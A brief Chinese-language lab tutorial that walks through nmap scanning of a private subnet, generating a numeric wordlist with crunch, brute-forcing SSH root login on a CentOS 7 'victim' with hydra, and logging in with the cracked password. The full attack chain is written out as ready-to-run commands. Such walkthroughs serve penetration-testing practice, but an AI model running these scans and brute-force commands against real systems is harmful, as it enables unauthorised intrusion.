環境準備:
1,kali //黑客機
2,centos7 //肉雞
3,hydra //系統自帶工具
4,crunch //系統自帶工具
操作步驟:
1,掃描網段裏的目標主機
nmap -sP 192.168.1.1-255 //掃描網段主機
nmap -sS 192.168.1.188 //掃描端口開放情況
nmap -O 192.168.1.188 //掃描系統,版本信息
nmap -sV 192.168.1.188 //掃描應用程序和應程序版本號
掃描到22端口是開着的,進行下一步操作,
2,生成密碼字典
crunch 6 6 123456 -d 1 -o 1.1txt
最小六位數,最大六位數,
密碼組成數字是123456
1.1txt是生成密碼後的文件
3,暴力破解
hydra -l root -P 1.1txt 192.168.1.188 ssh
也可以這樣
hydra -l root -P 1.1txt ssh://192.168.1.188
-l ------------------------- 指定用戶
-P -------------------------指定密碼字典
ssh -----------------------指定端口
我用是密碼字典是我自己寫的,也可以用密碼字典生成,
但是破解速度慢
破解成功:用戶 :root 密碼:123456
hydra破解成功的關鍵是密碼字典,密碼字典不行破解就不會成功,
3,登錄
ssh -l root 192.168.1.188
輸入密碼成功登陸到centos7,